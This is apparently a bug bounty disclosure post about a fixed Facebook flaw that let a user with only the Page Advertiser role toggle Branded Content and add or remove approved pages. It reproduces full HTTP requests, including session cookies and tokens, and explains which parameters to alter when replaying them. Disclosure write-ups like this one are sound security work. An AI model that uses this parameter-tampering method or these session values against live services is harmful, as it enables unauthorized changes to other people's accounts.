First of All, I want to thanks, Facebook Security Team for the bounty.The issue I reported was not an issue instead it was a design issue and Page Advertiser are permitted to add/remove and toggle Branded Content feature.They rewarded me because they found another issue while debugging.Explanation from Neal:
Steps to reproduce:
When we add turn on Branded Content a request like below is sent:
POST /branded_content/page_settings/update_whitelist_optin/?av=1876785249205812&dpr=1 HTTP/1.1
Host: www.facebook.com
Connection: close
Content-Length: 634
Origin: https://www.facebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://www.facebook.com/Orrej-1876785249205812/settings/?tab=branded_content
Accept-Language: en-US,en;q=0.9
Cookie: datr=47LXWR_0E8vW_i02sZxNKT5u; sb=7rLXWdKC_16EE3wngkoBPJGB; pl=n; c_user=100008608622215; xs=21%3AhZ5BhwE33H_qTg%3A2%3A1507308270%3A13272%3A5258; fr=05uojbvRnvZxtTmRz.AWWef29-8MA7qWOvIKoG1RQvlUs.BZ17Lj.MB.AAA.0.0.BZ18Ep.AWXKuZai; presence=EDvF3EtimeF1507265728EuserFA21B08608622215A2EstateFDutF1507265728256CEchFDp_5f1B08608622215F18CC; dpr=1; act=1507265759150%2F10; wd=1024x532
brand_page_id=1876785249205812&is_opted_in=true&opt_in_channel=page_settings&__user=100008608622215&__a=1&__dyn=5V4cjLx2ByK5A9UkKLqAyqomzFEvzEyGgS8VpCAjFGA4VEvCAyWzob4q4Fe8QubGqK5-EjCyEnyo88HyWDyUJt28gyEnGi4FpeuUy5qgPyU-F98lDokwxyKumbxKmaAUKjVuu-exvz8Gicx2q5odElByECii8yElAx6exu2aEmKmeC-Rx2U8ovG5FAi4e59XgDxq8xe5pVkdy8gwxCCyFETyUCfxyWLBx11yhvDKVplGmqcEyEzGfjgkz5fy9A7V8K-iify4ECmAVES68sxSUydy9ohWx24USaCx6eBBHCxjCDGvWz8C&__af=h0&__req=28&__be=1&__pc=PHASED:www_tahoe_pkg&__rev=3352768&fb_dtsg=AQG4iF2W0L7i:AQFS-CijK3QF&jazoest=2658171521057050874876551055865817083456710510675518170&__spin_r=3352768&__spin_b=trunk&__spin_t=1507312317
In the above request av is the PAGE VALUE and the value of brand_page_id is the value of Page we want turn on Branded Content.Changed the value of av and brand_page_id to a page in which my role is advertiser.Repeated the request and branded content is turned on.To turn off Branded Content just replace the value of is_opted_in to false,repeat the request and Branded Content will be turned off.
Adding/Deleting Page in Branded content:
Request like below is sent:
POST /branded_content/page_settings/add_creator/?av=1869802456635112&dpr=1 HTTP/1.1
Host: www.facebook.com
Connection: close
Content-Length: 687
Origin: https://www.facebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://www.facebook.com/Unofficial-PoC-1869802456635112/settings/?tab=branded_content
Accept-Language: en-US,en;q=0.9
Cookie: datr=47LXWR_0E8vW_i02sZxNKT5u; sb=7rLXWdKC_16EE3wngkoBPJGB; c_user=100008608622215; xs=21%3AhZ5BhwE33H_qTg%3A2%3A1507308270%3A13272%3A5258; fr=05uojbvRnvZxtTmRz.AWVjzFgHV6XTXaKdtXPwtoexOCk.BZ17Lj.MB.AAA.0.0.BZ17Lu.AWXSCpAz; pl=n; dpr=1; presence=EDvF3EtimeF1507263584EuserFA21B08608622215A2EstateFDutF1507263584212CEchFDp_5f1B08608622215F2CC; act=1507263641500%2F13; wd=1024x532
is_add=true&brand_page_id=1869802456635112&creator_id_to_update=125862224625410&add_whitelist_channel=page_settings_tab&__user=100008608622215&__a=1&__dyn=5V4cjLx2ByK5A9UkKLqAyqomzFEvzEyGgyi8VpCAjFGA4VEvCAyWzob4q4Fe8QubGqK5-EjCyEny422cyWDyUJt28gyEnGi4FpeuUzxeAcUKfGii5pS588oHDByUrByFebA-nDLzEnUOaAz8gCxm3q5poG9AAy8G5p8hzEnwyG5HBzFLJogK267Wxqp4x3xiuQ9Umy8jxmul3oy488pFFWCzubyoV1yWLBx6695-uXBBmFpEOyayeEZd1ick-8CgvWyXV98-8iypqjCzooxO7ry8S8Bx7G48yazoGq4oWmmKqmELhumGA-EO9w&__af=h0&__req=5y&__be=1&__pc=PHASED:www_tahoe_pkg&__rev=3352640&fb_dtsg=AQH98i0jxBPs:AQFlfyEJlDXW&jazoest=26581725756105481061206680115586581701081021216974108688887&__spin_r=3352640&__spin_b=trunk&__spin_t=1507308296
Change av and brand_page_id value is the value of PAGE in which we have Advertiser role.To delete a page from approved page change the value of is_add to false and the page will be deleted from Approved Page.
Timeline:
Saturday, October 7, 2017 at 12:30am:Issue Reported
Friday, October 13, 2017 at 12:50am:Triaged
Tuesday, October 24, 2017 at 6:57am:Fixed
Thursday, October 26, 2017 at 12:47am:$500 Bounty
Comments
Post a Comment